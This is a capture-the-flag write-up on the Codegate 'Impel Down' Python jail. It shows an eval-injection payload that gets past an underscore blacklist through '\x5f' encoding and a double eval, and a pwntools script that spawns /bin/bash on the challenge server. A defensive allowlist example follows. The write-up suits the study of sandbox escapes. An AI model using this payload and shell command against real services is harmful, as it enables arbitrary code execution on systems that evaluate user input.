Impel Down was a Python exploitation problem. Putting in random statements, I eventually got an error when putting in "digdig", which revealed part of the source code. It was doing eval("your."+input+"()"). After trying many things, I thought of evaling multiple things at once, separated by commas, to make a tuple. My payload was "dig(),eval(eval('raw\x5finput()')),", which would allow me to bypass the underscore blacklisting by using char encoding and eval'ing twice to allow execution of anything I put in. After that there were no restrictions, so I used __import__('os').system('/bin/bash') to get a shell and ran the executable to get the flag.

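```python
from pwn import *

p = remote("ch41l3ng3s.codegate.kr", 2014)
p.recv()
p.sendline(b"aaaaaaaa" * 200)
# Raw string: \x5f must reach the server as four literal characters,
# not as an underscore, or the blacklist would reject the line.
p.sendline(rb"dig(),eval(eval('raw\x5finput()')),")
# This line is read by the server-side raw_input(), so the blacklist no longer applies.
p.sendline(b"__import__('os').system('/bin/bash')")
p.interactive()
```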
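For the defensive side of the same bug, the following added example (not part of the original write-up or the challenge source) shows why a character blacklist in front of eval does not hold and what an allowlist dispatcher looks like instead. The `Prisoner` class, the `rest` action and all function names are hypothetical; only `dig` and the payload string come from the write-up.

```python
import ast

# Payload quoted in the write-up, kept as raw text: backslash, x, 5, f are
# four separate characters here, so no literal underscore is present.
PAYLOAD = r"dig(),eval(eval('raw\x5finput()')),"

class Prisoner:
    """Hypothetical stand-in for the challenge's `your` object."""
    def dig(self):
        return "dig"

    def rest(self):  # hypothetical second action, not from the write-up
        return "rest"

ALLOWED_ACTIONS = frozenset({"dig", "rest"})

def blacklist_accepts(text):
    """Filter style described in the write-up: only a literal underscore is refused."""
    return "_" not in text

def literal_after_parsing(source_literal):
    """Value of a Python string literal once parsed. Escape sequences are
    decoded at this point, which is after any input filter has already run."""
    return ast.literal_eval(source_literal)

def dispatch(obj, text):
    """Hardened dispatcher: input selects a method by exact name and is never evaluated."""
    name = text.strip()
    if name not in ALLOWED_ACTIONS:
        raise ValueError("unknown action")
    return getattr(obj, name)()

def is_rejected(obj, text):
    """True when the hardened dispatcher refuses the input."""
    try:
        dispatch(obj, text)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    print("blacklist accepts payload:", blacklist_accepts(PAYLOAD))
    print("inner literal decodes to:", literal_after_parsing(r"'raw\x5finput()'"))
    print("allowlist runs dig:", dispatch(Prisoner(), "dig"))
    print("allowlist rejects payload:", is_rejected(Prisoner(), PAYLOAD))
```

The allowlist treats the input purely as a lookup key, so encoding tricks inside it have nothing to decode them.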